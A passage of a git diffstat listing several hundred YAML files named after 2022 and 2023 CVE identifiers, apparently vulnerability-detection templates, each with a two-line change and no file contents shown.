http/cves/2022/CVE-2022-23347.yaml | 2 +- http/cves/2022/CVE-2022-23348.yaml | 2 +- http/cves/2022/CVE-2022-23544.yaml | 2 +- http/cves/2022/CVE-2022-2376.yaml | 2 +- http/cves/2022/CVE-2022-23779.yaml | 2 +- http/cves/2022/CVE-2022-23808.yaml | 2 +- http/cves/2022/CVE-2022-2383.yaml | 2 +- http/cves/2022/CVE-2022-23854.yaml | 2 +- http/cves/2022/CVE-2022-23898.yaml | 2 +- http/cves/2022/CVE-2022-24112.yaml | 2 +- http/cves/2022/CVE-2022-24124.yaml | 2 +- http/cves/2022/CVE-2022-2414.yaml | 2 +- http/cves/2022/CVE-2022-24181.yaml | 2 +- http/cves/2022/CVE-2022-24260.yaml | 2 +- http/cves/2022/CVE-2022-24264.yaml | 2 +- http/cves/2022/CVE-2022-24266.yaml | 2 +- http/cves/2022/CVE-2022-24288.yaml | 2 +- http/cves/2022/CVE-2022-24384.yaml | 2 +- http/cves/2022/CVE-2022-24627.yaml | 2 +- http/cves/2022/CVE-2022-24681.yaml | 2 +- http/cves/2022/CVE-2022-24716.yaml | 2 +- http/cves/2022/CVE-2022-24856.yaml | 2 +- http/cves/2022/CVE-2022-2486.yaml | 2 +- http/cves/2022/CVE-2022-2487.yaml | 2 +- http/cves/2022/CVE-2022-2488.yaml | 2 +- http/cves/2022/CVE-2022-24899.yaml | 2 +- http/cves/2022/CVE-2022-24900.yaml | 2 +- http/cves/2022/CVE-2022-25082.yaml | 2 +- http/cves/2022/CVE-2022-25148.yaml | 2 +- http/cves/2022/CVE-2022-25149.yaml | 2 +- http/cves/2022/CVE-2022-25216.yaml | 2 +- http/cves/2022/CVE-2022-25323.yaml | 2 +- http/cves/2022/CVE-2022-2535.yaml | 2 +- http/cves/2022/CVE-2022-25356.yaml | 2 +- http/cves/2022/CVE-2022-2546.yaml | 2 +- http/cves/2022/CVE-2022-25481.yaml | 2 +- http/cves/2022/CVE-2022-25487.yaml | 2 +- http/cves/2022/CVE-2022-25489.yaml | 2 +- http/cves/2022/CVE-2022-25497.yaml | 2 +- http/cves/2022/CVE-2022-2551.yaml | 2 +- http/cves/2022/CVE-2022-25568.yaml | 2 +- http/cves/2022/CVE-2022-2599.yaml | 2 +- http/cves/2022/CVE-2022-26134.yaml | 2 +- http/cves/2022/CVE-2022-26138.yaml | 2 +- http/cves/2022/CVE-2022-26148.yaml | 2 +- http/cves/2022/CVE-2022-26233.yaml | 2 +- http/cves/2022/CVE-2022-2627.yaml | 2 +- http/cves/2022/CVE-2022-26352.yaml | 2 +- http/cves/2022/CVE-2022-26564.yaml | 2 +- http/cves/2022/CVE-2022-26833.yaml | 2 +- http/cves/2022/CVE-2022-26960.yaml | 2 +- http/cves/2022/CVE-2022-2733.yaml | 2 +- http/cves/2022/CVE-2022-2756.yaml | 2 +- http/cves/2022/CVE-2022-27593.yaml | 2 +- http/cves/2022/CVE-2022-27926.yaml | 2 +- http/cves/2022/CVE-2022-28023.yaml | 2 +- http/cves/2022/CVE-2022-28032.yaml | 2 +- http/cves/2022/CVE-2022-28079.yaml | 2 +- http/cves/2022/CVE-2022-28080.yaml | 2 +- http/cves/2022/CVE-2022-28117.yaml | 2 +- http/cves/2022/CVE-2022-28219.yaml | 2 +- http/cves/2022/CVE-2022-28363.yaml | 2 +- http/cves/2022/CVE-2022-28365.yaml | 2 +- http/cves/2022/CVE-2022-2863.yaml | 2 +- http/cves/2022/CVE-2022-28955.yaml | 2 +- http/cves/2022/CVE-2022-29004.yaml | 2 +- http/cves/2022/CVE-2022-29005.yaml | 2 +- http/cves/2022/CVE-2022-29006.yaml | 2 +- http/cves/2022/CVE-2022-29007.yaml | 2 +- http/cves/2022/CVE-2022-29009.yaml | 2 +- http/cves/2022/CVE-2022-29013.yaml | 2 +- http/cves/2022/CVE-2022-29014.yaml | 2 +- http/cves/2022/CVE-2022-29078.yaml | 2 +- http/cves/2022/CVE-2022-29153.yaml | 2 +- http/cves/2022/CVE-2022-29272.yaml | 2 +- http/cves/2022/CVE-2022-29298.yaml | 2 +- http/cves/2022/CVE-2022-29303.yaml | 2 +- http/cves/2022/CVE-2022-29349.yaml | 2 +- http/cves/2022/CVE-2022-29464.yaml | 2 +- http/cves/2022/CVE-2022-29548.yaml | 2 +- http/cves/2022/CVE-2022-29775.yaml | 2 +- http/cves/2022/CVE-2022-30073.yaml | 2 +- http/cves/2022/CVE-2022-30489.yaml | 2 +- http/cves/2022/CVE-2022-30512.yaml | 2 +- http/cves/2022/CVE-2022-30513.yaml | 2 +- http/cves/2022/CVE-2022-30525.yaml | 2 +- http/cves/2022/CVE-2022-3062.yaml | 2 +- http/cves/2022/CVE-2022-30776.yaml | 2 +- http/cves/2022/CVE-2022-30777.yaml | 2 +- http/cves/2022/CVE-2022-31126.yaml | 2 +- http/cves/2022/CVE-2022-31268.yaml | 2 +- http/cves/2022/CVE-2022-31269.yaml | 2 +- http/cves/2022/CVE-2022-31373.yaml | 2 +- http/cves/2022/CVE-2022-3142.yaml | 2 +- http/cves/2022/CVE-2022-31499.yaml | 2 +- http/cves/2022/CVE-2022-31656.yaml | 2 +- http/cves/2022/CVE-2022-31798.yaml | 2 +- http/cves/2022/CVE-2022-31814.yaml | 2 +- http/cves/2022/CVE-2022-31845.yaml | 2 +- http/cves/2022/CVE-2022-31846.yaml | 2 +- http/cves/2022/CVE-2022-31847.yaml | 2 +- http/cves/2022/CVE-2022-31854.yaml | 2 +- http/cves/2022/CVE-2022-31879.yaml | 2 +- http/cves/2022/CVE-2022-31976.yaml | 2 +- http/cves/2022/CVE-2022-31977.yaml | 2 +- http/cves/2022/CVE-2022-31981.yaml | 2 +- http/cves/2022/CVE-2022-31983.yaml | 2 +- http/cves/2022/CVE-2022-31984.yaml | 2 +- http/cves/2022/CVE-2022-32015.yaml | 2 +- http/cves/2022/CVE-2022-32018.yaml | 2 +- http/cves/2022/CVE-2022-32022.yaml | 2 +- http/cves/2022/CVE-2022-32024.yaml | 2 +- http/cves/2022/CVE-2022-32025.yaml | 2 +- http/cves/2022/CVE-2022-32026.yaml | 2 +- http/cves/2022/CVE-2022-32028.yaml | 2 +- http/cves/2022/CVE-2022-32094.yaml | 2 +- http/cves/2022/CVE-2022-32195.yaml | 2 +- http/cves/2022/CVE-2022-32409.yaml | 2 +- http/cves/2022/CVE-2022-3242.yaml | 2 +- http/cves/2022/CVE-2022-32429.yaml | 2 +- http/cves/2022/CVE-2022-32430.yaml | 2 +- http/cves/2022/CVE-2022-32444.yaml | 2 +- http/cves/2022/CVE-2022-32770.yaml | 2 +- http/cves/2022/CVE-2022-32771.yaml | 2 +- http/cves/2022/CVE-2022-32772.yaml | 2 +- http/cves/2022/CVE-2022-33119.yaml | 2 +- http/cves/2022/CVE-2022-33174.yaml | 2 +- http/cves/2022/CVE-2022-33891.yaml | 2 +- http/cves/2022/CVE-2022-33901.yaml | 2 +- http/cves/2022/CVE-2022-33965.yaml | 2 +- http/cves/2022/CVE-2022-34045.yaml | 2 +- http/cves/2022/CVE-2022-34046.yaml | 2 +- http/cves/2022/CVE-2022-34047.yaml | 2 +- http/cves/2022/CVE-2022-34048.yaml | 2 +- http/cves/2022/CVE-2022-34049.yaml | 2 +- http/cves/2022/CVE-2022-34093.yaml | 2 +- http/cves/2022/CVE-2022-34094.yaml | 2 +- http/cves/2022/CVE-2022-34121.yaml | 2 +- http/cves/2022/CVE-2022-34328.yaml | 2 +- http/cves/2022/CVE-2022-34576.yaml | 2 +- http/cves/2022/CVE-2022-34590.yaml | 2 +- http/cves/2022/CVE-2022-34753.yaml | 2 +- http/cves/2022/CVE-2022-35151.yaml | 2 +- http/cves/2022/CVE-2022-35405.yaml | 2 +- http/cves/2022/CVE-2022-35413.yaml | 2 +- http/cves/2022/CVE-2022-35416.yaml | 2 +- http/cves/2022/CVE-2022-35493.yaml | 2 +- http/cves/2022/CVE-2022-35653.yaml | 2 +- http/cves/2022/CVE-2022-3578.yaml | 2 +- http/cves/2022/CVE-2022-35914.yaml | 2 +- http/cves/2022/CVE-2022-36446.yaml | 2 +- http/cves/2022/CVE-2022-36537.yaml | 2 +- http/cves/2022/CVE-2022-36553.yaml | 2 +- http/cves/2022/CVE-2022-36642.yaml | 2 +- http/cves/2022/CVE-2022-36804.yaml | 2 +- http/cves/2022/CVE-2022-37153.yaml | 2 +- http/cves/2022/CVE-2022-37190.yaml | 2 +- http/cves/2022/CVE-2022-37299.yaml | 2 +- http/cves/2022/CVE-2022-3768.yaml | 2 +- http/cves/2022/CVE-2022-38131.yaml | 2 +- http/cves/2022/CVE-2022-38463.yaml | 2 +- http/cves/2022/CVE-2022-38553.yaml | 2 +- http/cves/2022/CVE-2022-38637.yaml | 2 +- http/cves/2022/CVE-2022-38794.yaml | 2 +- http/cves/2022/CVE-2022-38817.yaml | 2 +- http/cves/2022/CVE-2022-38870.yaml | 2 +- http/cves/2022/CVE-2022-39048.yaml | 2 +- http/cves/2022/CVE-2022-39195.yaml | 2 +- http/cves/2022/CVE-2022-3980.yaml | 2 +- http/cves/2022/CVE-2022-3982.yaml | 2 +- http/cves/2022/CVE-2022-39952.yaml | 2 +- http/cves/2022/CVE-2022-39960.yaml | 2 +- http/cves/2022/CVE-2022-39986.yaml | 2 +- http/cves/2022/CVE-2022-40022.yaml | 2 +- http/cves/2022/CVE-2022-40032.yaml | 2 +- http/cves/2022/CVE-2022-40047.yaml | 2 +- http/cves/2022/CVE-2022-40083.yaml | 2 +- http/cves/2022/CVE-2022-40127.yaml | 2 +- http/cves/2022/CVE-2022-4049.yaml | 2 +- http/cves/2022/CVE-2022-4050.yaml | 2 +- http/cves/2022/CVE-2022-4057.yaml | 2 +- http/cves/2022/CVE-2022-4059.yaml | 2 +- http/cves/2022/CVE-2022-4063.yaml | 2 +- http/cves/2022/CVE-2022-40734.yaml | 2 +- http/cves/2022/CVE-2022-40843.yaml | 2 +- http/cves/2022/CVE-2022-40879.yaml | 2 +- http/cves/2022/CVE-2022-40881.yaml | 2 +- http/cves/2022/CVE-2022-4117.yaml | 2 +- http/cves/2022/CVE-2022-41412.yaml | 2 +- http/cves/2022/CVE-2022-41441.yaml | 2 +- http/cves/2022/CVE-2022-41473.yaml | 2 +- http/cves/2022/CVE-2022-42094.yaml | 2 +- http/cves/2022/CVE-2022-42096.yaml | 2 +- http/cves/2022/CVE-2022-42233.yaml | 2 +- http/cves/2022/CVE-2022-42746.yaml | 2 +- http/cves/2022/CVE-2022-42747.yaml | 2 +- http/cves/2022/CVE-2022-42748.yaml | 2 +- http/cves/2022/CVE-2022-42749.yaml | 2 +- http/cves/2022/CVE-2022-4295.yaml | 2 +- http/cves/2022/CVE-2022-43014.yaml | 2 +- http/cves/2022/CVE-2022-43015.yaml | 2 +- http/cves/2022/CVE-2022-43016.yaml | 2 +- http/cves/2022/CVE-2022-43017.yaml | 2 +- http/cves/2022/CVE-2022-43018.yaml | 2 +- http/cves/2022/CVE-2022-4305.yaml | 2 +- http/cves/2022/CVE-2022-43164.yaml | 2 +- http/cves/2022/CVE-2022-43165.yaml | 2 +- http/cves/2022/CVE-2022-43166.yaml | 2 +- http/cves/2022/CVE-2022-43167.yaml | 2 +- http/cves/2022/CVE-2022-43169.yaml | 2 +- http/cves/2022/CVE-2022-43170.yaml | 2 +- http/cves/2022/CVE-2022-43185.yaml | 2 +- http/cves/2022/CVE-2022-4321.yaml | 2 +- http/cves/2022/CVE-2022-43769.yaml | 2 +- http/cves/2022/CVE-2022-44290.yaml | 2 +- http/cves/2022/CVE-2022-4447.yaml | 2 +- http/cves/2022/CVE-2022-44877.yaml | 2 +- http/cves/2022/CVE-2022-44944.yaml | 2 +- http/cves/2022/CVE-2022-44946.yaml | 2 +- http/cves/2022/CVE-2022-44947.yaml | 2 +- http/cves/2022/CVE-2022-44948.yaml | 2 +- http/cves/2022/CVE-2022-44949.yaml | 2 +- http/cves/2022/CVE-2022-44950.yaml | 2 +- http/cves/2022/CVE-2022-44951.yaml | 2 +- http/cves/2022/CVE-2022-44952.yaml | 2 +- http/cves/2022/CVE-2022-44957.yaml | 2 +- http/cves/2022/CVE-2022-45354.yaml | 2 +- http/cves/2022/CVE-2022-45365.yaml | 2 +- http/cves/2022/CVE-2022-45805.yaml | 2 +- http/cves/2022/CVE-2022-45917.yaml | 2 +- http/cves/2022/CVE-2022-45933.yaml | 2 +- http/cves/2022/CVE-2022-46020.yaml | 2 +- http/cves/2022/CVE-2022-46073.yaml | 2 +- http/cves/2022/CVE-2022-46169.yaml | 2 +- http/cves/2022/CVE-2022-46381.yaml | 2 +- http/cves/2022/CVE-2022-46463.yaml | 2 +- http/cves/2022/CVE-2022-46888.yaml | 2 +- http/cves/2022/CVE-2022-46934.yaml | 2 +- http/cves/2022/CVE-2022-47002.yaml | 2 +- http/cves/2022/CVE-2022-47075.yaml | 2 +- http/cves/2022/CVE-2022-47615.yaml | 2 +- http/cves/2022/CVE-2022-47945.yaml | 2 +- http/cves/2022/CVE-2022-47966.yaml | 2 +- http/cves/2022/CVE-2022-47986.yaml | 2 +- http/cves/2022/CVE-2022-48012.yaml | 2 +- http/cves/2022/CVE-2022-48165.yaml | 2 +- http/cves/2022/CVE-2022-48197.yaml | 2 +- http/cves/2022/CVE-2022-4897.yaml | 2 +- http/cves/2023/CVE-2023-0099.yaml | 2 +- http/cves/2023/CVE-2023-0126.yaml | 2 +- http/cves/2023/CVE-2023-0159.yaml | 2 +- http/cves/2023/CVE-2023-0236.yaml | 2 +- http/cves/2023/CVE-2023-0297.yaml | 2 +- http/cves/2023/CVE-2023-0334.yaml | 2 +- http/cves/2023/CVE-2023-0448.yaml | 2 +- http/cves/2023/CVE-2023-0514.yaml | 2 +- http/cves/2023/CVE-2023-0527.yaml | 2 +- http/cves/2023/CVE-2023-0552.yaml | 2 +- http/cves/2023/CVE-2023-0562.yaml | 2 +- http/cves/2023/CVE-2023-0600.yaml | 2 +- http/cves/2023/CVE-2023-0602.yaml | 2 +- http/cves/2023/CVE-2023-0630.yaml | 2 +- http/cves/2023/CVE-2023-0669.yaml | 2 +- http/cves/2023/CVE-2023-0678.yaml | 2 +- http/cves/2023/CVE-2023-0900.yaml | 2 +- http/cves/2023/CVE-2023-0942.yaml | 2 +- http/cves/2023/CVE-2023-0947.yaml | 2 +- http/cves/2023/CVE-2023-0948.yaml | 2 +- http/cves/2023/CVE-2023-0968.yaml | 2 +- http/cves/2023/CVE-2023-1020.yaml | 2 +- http/cves/2023/CVE-2023-1080.yaml | 2 +- http/cves/2023/CVE-2023-1177.yaml | 2 +- http/cves/2023/CVE-2023-1263.yaml | 2 +- http/cves/2023/CVE-2023-1362.yaml | 2 +- http/cves/2023/CVE-2023-1408.yaml | 2 +- http/cves/2023/CVE-2023-1454.yaml | 2 +- http/cves/2023/CVE-2023-1496.yaml | 2 +- http/cves/2023/CVE-2023-1546.yaml | 2 +- http/cves/2023/CVE-2023-1671.yaml | 2 +- http/cves/2023/CVE-2023-1698.yaml | 2 +- http/cves/2023/CVE-2023-1719.yaml | 2 +- http/cves/2023/CVE-2023-1730.yaml | 2 +- http/cves/2023/CVE-2023-1780.yaml | 2 +- http/cves/2023/CVE-2023-1835.yaml | 2 +- http/cves/2023/CVE-2023-1880.yaml | 2 +- http/cves/2023/CVE-2023-1890.yaml | 2 +- http/cves/2023/CVE-2023-1892.yaml | 2 +- http/cves/2023/CVE-2023-20073.yaml | 2 +- http/cves/2023/CVE-2023-2009.yaml | 2 +- http/cves/2023/CVE-2023-2023.yaml | 2 +- http/cves/2023/CVE-2023-2059.yaml | 2 +- http/cves/2023/CVE-2023-20864.yaml | 2 +- http/cves/2023/CVE-2023-20887.yaml | 2 +- http/cves/2023/CVE-2023-20888.yaml | 2 +- http/cves/2023/CVE-2023-20889.yaml | 2 +- http/cves/2023/CVE-2023-2122.yaml | 2 +- http/cves/2023/CVE-2023-2130.yaml | 2 +- http/cves/2023/CVE-2023-2178.yaml | 2 +- http/cves/2023/CVE-2023-22232.yaml | 2 +- http/cves/2023/CVE-2023-2224.yaml | 2 +- http/cves/2023/CVE-2023-2227.yaml | 2 +- http/cves/2023/CVE-2023-22432.yaml | 2 +- http/cves/2023/CVE-2023-22463.yaml | 2 +- http/cves/2023/CVE-2023-22478.yaml | 2 +- http/cves/2023/CVE-2023-22480.yaml | 2 +- http/cves/2023/CVE-2023-22515.yaml | 2 +- http/cves/2023/CVE-2023-22518.yaml | 2 +- http/cves/2023/CVE-2023-2252.yaml | 2 +- http/cves/2023/CVE-2023-22527.yaml | 2 +- http/cves/2023/CVE-2023-22620.yaml | 2 +- http/cves/2023/CVE-2023-2272.yaml | 2 +- http/cves/2023/CVE-2023-22897.yaml | 2 +- http/cves/2023/CVE-2023-23161.yaml | 2 +- http/cves/2023/CVE-2023-23333.yaml | 2 +- http/cves/2023/CVE-2023-23488.yaml | 2 +- http/cves/2023/CVE-2023-23489.yaml | 2 +- http/cves/2023/CVE-2023-23491.yaml | 2 +- http/cves/2023/CVE-2023-23492.yaml | 2 +- http/cves/2023/CVE-2023-2356.yaml | 2 +- http/cves/2023/CVE-2023-23752.yaml | 2 +- http/cves/2023/CVE-2023-24044.yaml | 2 +- http/cves/2023/CVE-2023-24243.yaml | 2 +- http/cves/2023/CVE-2023-24278.yaml | 2 +- http/cves/2023/CVE-2023-24322.yaml | 2 +- http/cves/2023/CVE-2023-24488.yaml | 2 +- http/cves/2023/CVE-2023-24489.yaml | 2 +- http/cves/2023/CVE-2023-24657.yaml | 2 +- http/cves/2023/CVE-2023-24733.yaml | 2 +- http/cves/2023/CVE-2023-24735.yaml | 2 +- http/cves/2023/CVE-2023-24737.yaml | 2 +- http/cves/2023/CVE-2023-2479.yaml | 2 +- http/cves/2023/CVE-2023-25135.yaml | 2 +- http/cves/2023/CVE-2023-25157.yaml | 2 +- http/cves/2023/CVE-2023-25194.yaml | 2 +- http/cves/2023/CVE-2023-25346.yaml | 2 +- http/cves/2023/CVE-2023-25573.yaml | 2 +- http/cves/2023/CVE-2023-25717.yaml | 2 +- http/cves/2023/CVE-2023-26035.yaml | 2 +- http/cves/2023/CVE-2023-26255.yaml | 2 +- http/cves/2023/CVE-2023-26256.yaml | 2 +- http/cves/2023/CVE-2023-26347.yaml | 2 +- http/cves/2023/CVE-2023-26360.yaml | 2 +- http/cves/2023/CVE-2023-26469.yaml | 2 +- http/cves/2023/CVE-2023-26842.yaml | 2 +- http/cves/2023/CVE-2023-26843.yaml | 2 +- http/cves/2023/CVE-2023-27008.yaml | 2 +- http/cves/2023/CVE-2023-27032.yaml | 2 +- http/cves/2023/CVE-2023-27034.yaml | 2 +- http/cves/2023/CVE-2023-27159.yaml | 2 +- http/cves/2023/CVE-2023-27179.yaml | 2 +- http/cves/2023/CVE-2023-27292.yaml | 2 +- http/cves/2023/CVE-2023-2732.yaml | 2 +- http/cves/2023/CVE-2023-27350.yaml | 2 +- http/cves/2023/CVE-2023-27372.yaml | 2 +- http/cves/2023/CVE-2023-27482.yaml | 2 +- http/cves/2023/CVE-2023-27524.yaml | 2 +- http/cves/2023/CVE-2023-27587.yaml | 2 +- http/cves/2023/CVE-2023-27639.yaml | 2 +- http/cves/2023/CVE-2023-27640.yaml | 2 +- http/cves/2023/CVE-2023-2766.yaml | 2 +- http/cves/2023/CVE-2023-2779.yaml | 2 +- http/cves/2023/CVE-2023-2780.yaml | 2 +- http/cves/2023/CVE-2023-27922.yaml | 2 +- http/cves/2023/CVE-2023-2796.yaml | 2 +- http/cves/2023/CVE-2023-28121.yaml | 2 +- http/cves/2023/CVE-2023-2813.yaml | 2 +- http/cves/2023/CVE-2023-2822.yaml | 2 +- http/cves/2023/CVE-2023-2825.yaml | 2 +- http/cves/2023/CVE-2023-28343.yaml | 2 +- http/cves/2023/CVE-2023-28432.yaml | 2 +- http/cves/2023/CVE-2023-28662.yaml | 2 +- http/cves/2023/CVE-2023-28665.yaml | 2 +- http/cves/2023/CVE-2023-29084.yaml | 2 +- http/cves/2023/CVE-2023-29298.yaml | 2 +- http/cves/2023/CVE-2023-29300.yaml | 2 +- http/cves/2023/CVE-2023-29357.yaml | 2 +- http/cves/2023/CVE-2023-29439.yaml | 2 +- http/cves/2023/CVE-2023-2948.yaml | 2 +- http/cves/2023/CVE-2023-29489.yaml | 2 +- http/cves/2023/CVE-2023-2949.yaml | 2 +- http/cves/2023/CVE-2023-29622.yaml | 2 +- http/cves/2023/CVE-2023-29623.yaml | 2 +- http/cves/2023/CVE-2023-2982.yaml | 2 +- http/cves/2023/CVE-2023-29827.yaml | 2 +- http/cves/2023/CVE-2023-29887.yaml | 2 +- http/cves/2023/CVE-2023-29919.yaml | 2 +- http/cves/2023/CVE-2023-29922.yaml | 2 +- http/cves/2023/CVE-2023-29923.yaml | 2 +- http/cves/2023/CVE-2023-30013.yaml | 2 +- http/cves/2023/CVE-2023-30019.yaml | 2 +- http/cves/2023/CVE-2023-30150.yaml | 2 +- http/cves/2023/CVE-2023-30210.yaml | 2 +- http/cves/2023/CVE-2023-30212.yaml | 2 +- http/cves/2023/CVE-2023-30256.yaml | 2 +- http/cves/2023/CVE-2023-30258.yaml | 2 +- http/cves/2023/CVE-2023-30534.yaml | 2 +- http/cves/2023/CVE-2023-30625.yaml | 2 +- http/cves/2023/CVE-2023-3077.yaml | 2 +- http/cves/2023/CVE-2023-30777.yaml | 2 +- http/cves/2023/CVE-2023-30868.yaml | 2 +- http/cves/2023/CVE-2023-30943.yaml | 2 +- http/cves/2023/CVE-2023-31059.yaml | 2 +- http/cves/2023/CVE-2023-31446.yaml | 2 +- http/cves/2023/CVE-2023-31465.yaml | 2 +- http/cves/2023/CVE-2023-31548.yaml | 2 +- http/cves/2023/CVE-2023-32077.yaml | 2 +- http/cves/2023/CVE-2023-3219.yaml | 2 +- http/cves/2023/CVE-2023-32243.yaml | 2 +- http/cves/2023/CVE-2023-32315.yaml | 2 +- http/cves/2023/CVE-2023-32563.yaml | 2 +- http/cves/2023/CVE-2023-33338.yaml | 2 +- http/cves/2023/CVE-2023-33405.yaml | 2 +- http/cves/2023/CVE-2023-33439.yaml | 2 +- http/cves/2023/CVE-2023-33440.yaml | 2 +- http/cves/2023/CVE-2023-3345.yaml | 2 +- http/cves/2023/CVE-2023-33510.yaml | 2 +- http/cves/2023/CVE-2023-33568.yaml | 2 +- http/cves/2023/CVE-2023-33584.yaml | 2 +- http/cves/2023/CVE-2023-33629.yaml | 2 +- http/cves/2023/CVE-2023-3368.yaml | 2 +- http/cves/2023/CVE-2023-33831.yaml | 2 +- http/cves/2023/CVE-2023-34020.yaml | 2 +- http/cves/2023/CVE-2023-34124.yaml | 2 +- http/cves/2023/CVE-2023-34259.yaml | 2 +- http/cves/2023/CVE-2023-34362.yaml | 2 +- http/cves/2023/CVE-2023-34537.yaml | 2 +- http/cves/2023/CVE-2023-34598.yaml | 2 +- http/cves/2023/CVE-2023-34599.yaml | 2 +- http/cves/2023/CVE-2023-3460.yaml | 2 +- http/cves/2023/CVE-2023-34659.yaml | 2 +- http/cves/2023/CVE-2023-34751.yaml | 2 +- http/cves/2023/CVE-2023-34752.yaml | 2 +- http/cves/2023/CVE-2023-34753.yaml | 2 +- http/cves/2023/CVE-2023-34755.yaml | 2 +- http/cves/2023/CVE-2023-34756.yaml | 2 +- http/cves/2023/CVE-2023-3479.yaml | 2 +- http/cves/2023/CVE-2023-34843.yaml | 2 +- http/cves/2023/CVE-2023-34960.yaml | 2 +- http/cves/2023/CVE-2023-34993.yaml | 2 +- http/cves/2023/CVE-2023-35078.yaml | 2 +- http/cves/2023/CVE-2023-35082.yaml | 2 +- http/cves/2023/CVE-2023-35158.yaml | 2 +- http/cves/2023/CVE-2023-35813.yaml | 2 +- http/cves/2023/CVE-2023-35843.yaml | 2 +- http/cves/2023/CVE-2023-35844.yaml | 2 +- http/cves/2023/CVE-2023-35885.yaml | 2 +- http/cves/2023/CVE-2023-36144.yaml | 2 +- http/cves/2023/CVE-2023-36284.yaml | 2 +- http/cves/2023/CVE-2023-36287.yaml | 2 +- http/cves/2023/CVE-2023-36289.yaml | 2 +- http/cves/2023/CVE-2023-36306.yaml | 2 +- http/cves/2023/CVE-2023-36346.yaml | 2 +- http/cves/2023/CVE-2023-36347.yaml | 2 +- http/cves/2023/CVE-2023-36844.yaml | 2 +- http/cves/2023/CVE-2023-36845.yaml | 2 +- http/cves/2023/CVE-2023-36934.yaml | 2 +- http/cves/2023/CVE-2023-3710.yaml | 2 +- http/cves/2023/CVE-2023-37265.yaml | 2 +- http/cves/2023/CVE-2023-37266.yaml | 2 +- http/cves/2023/CVE-2023-37270.yaml | 2 +- http/cves/2023/CVE-2023-37462.yaml | 2 +- http/cves/2023/CVE-2023-37474.yaml | 2 +- http/cves/2023/CVE-2023-37580.yaml | 2 +- http/cves/2023/CVE-2023-37629.yaml | 2 +- http/cves/2023/CVE-2023-3765.yaml | 2 +- http/cves/2023/CVE-2023-37679.yaml | 2 +- http/cves/2023/CVE-2023-37728.yaml | 2 +- http/cves/2023/CVE-2023-37979.yaml | 2 +- http/cves/2023/CVE-2023-38035.yaml | 2 +- http/cves/2023/CVE-2023-38203.yaml | 2 +- http/cves/2023/CVE-2023-38205.yaml | 2 +- http/cves/2023/CVE-2023-3836.yaml | 2 +- http/cves/2023/CVE-2023-3843.yaml | 2 +- http/cves/2023/CVE-2023-38433.yaml | 2 +- http/cves/2023/CVE-2023-3845.yaml | 2 +- http/cves/2023/CVE-2023-3847.yaml | 2 +- http/cves/2023/CVE-2023-3848.yaml | 2 +- http/cves/2023/CVE-2023-3849.yaml | 2 +- http/cves/2023/CVE-2023-38501.yaml | 2 +- http/cves/2023/CVE-2023-38646.yaml | 2 +- http/cves/2023/CVE-2023-38964.yaml | 2 +- http/cves/2023/CVE-2023-39002.yaml | 2 +- http/cves/2023/CVE-2023-39026.yaml | 2 +- http/cves/2023/CVE-2023-39108.yaml | 2 +- http/cves/2023/CVE-2023-39109.yaml | 2 +- http/cves/2023/CVE-2023-39110.yaml | 2 +- http/cves/2023/CVE-2023-39141.yaml | 2 +- http/cves/2023/CVE-2023-39143.yaml | 2 +- http/cves/2023/CVE-2023-3936.yaml | 2 +- http/cves/2023/CVE-2023-39361.yaml | 2 +- http/cves/2023/CVE-2023-39598.yaml | 2 +- http/cves/2023/CVE-2023-39600.yaml | 2 +- http/cves/2023/CVE-2023-39676.yaml | 2 +- http/cves/2023/CVE-2023-39677.yaml | 2 +- http/cves/2023/CVE-2023-39700.yaml | 2 +- http/cves/2023/CVE-2023-39796.yaml | 2 +- http/cves/2023/CVE-2023-40208.yaml | 2 +- http/cves/2023/CVE-2023-40355.yaml | 2 +- http/cves/2023/CVE-2023-40779.yaml | 2 +- http/cves/2023/CVE-2023-4110.yaml | 2 +- http/cves/2023/CVE-2023-41109.yaml | 2 +- http/cves/2023/CVE-2023-4111.yaml | 2 +- http/cves/2023/CVE-2023-4112.yaml | 2 +- http/cves/2023/CVE-2023-4113.yaml | 2 +- http/cves/2023/CVE-2023-4114.yaml | 2 +- http/cves/2023/CVE-2023-4115.yaml | 2 +- http/cves/2023/CVE-2023-4116.yaml | 2 +- http/cves/2023/CVE-2023-41265.yaml | 2 +- http/cves/2023/CVE-2023-41266.yaml | 2 +- http/cves/2023/CVE-2023-4148.yaml | 2 +- http/cves/2023/CVE-2023-41538.yaml | 2 +- http/cves/2023/CVE-2023-41642.yaml | 2 +- http/cves/2023/CVE-2023-4168.yaml | 2 +- http/cves/2023/CVE-2023-4169.yaml | 2 +- http/cves/2023/CVE-2023-4173.yaml | 2 +- http/cves/2023/CVE-2023-4174.yaml | 2 +- http/cves/2023/CVE-2023-41763.yaml | 2 +- http/cves/2023/CVE-2023-41892.yaml | 2 +- http/cves/2023/CVE-2023-42442.yaml | 2 +- http/cves/2023/CVE-2023-42793.yaml | 2 +- http/cves/2023/CVE-2023-43177.yaml | 2 +- http/cves/2023/CVE-2023-43187.yaml | 2 +- http/cves/2023/CVE-2023-43208.yaml | 2 +- http/cves/2023/CVE-2023-43261.yaml | 2 +- http/cves/2023/CVE-2023-43325.yaml | 2 +- http/cves/2023/CVE-2023-43326.yaml | 2 +- http/cves/2023/CVE-2023-43374.yaml | 2 +- http/cves/2023/CVE-2023-43795.yaml | 2 +- http/cves/2023/CVE-2023-4415.yaml | 2 +- http/cves/2023/CVE-2023-44352.yaml | 2 +- http/cves/2023/CVE-2023-44353.yaml | 2 +- http/cves/2023/CVE-2023-4451.yaml | 2 +- http/cves/2023/CVE-2023-44812.yaml | 2 +- http/cves/2023/CVE-2023-44813.yaml | 2 +- http/cves/2023/CVE-2023-4521.yaml | 2 +- http/cves/2023/CVE-2023-45375.yaml | 2 +- http/cves/2023/CVE-2023-4542.yaml | 2 +- http/cves/2023/CVE-2023-4547.yaml | 2 +- http/cves/2023/CVE-2023-45542.yaml | 2 +- http/cves/2023/CVE-2023-45671.yaml | 2 +- http/cves/2023/CVE-2023-4568.yaml | 2 +- http/cves/2023/CVE-2023-45852.yaml | 2 +- http/cves/2023/CVE-2023-45855.yaml | 2 +- http/cves/2023/CVE-2023-4596.yaml | 2 +- http/cves/2023/CVE-2023-4634.yaml | 2 +- http/cves/2023/CVE-2023-46347.yaml | 2 +- http/cves/2023/CVE-2023-46359.yaml | 2 +- http/cves/2023/CVE-2023-46574.yaml | 2 +- http/cves/2023/CVE-2023-46747.yaml | 2 +- http/cves/2023/CVE-2023-46805.yaml | 2 +- http/cves/2023/CVE-2023-4714.yaml | 2 +- http/cves/2023/CVE-2023-47211.yaml | 2 +- http/cves/2023/CVE-2023-47218.yaml | 2 +- http/cves/2023/CVE-2023-47246.yaml | 2 +- http/cves/2023/CVE-2023-47643.yaml | 2 +- 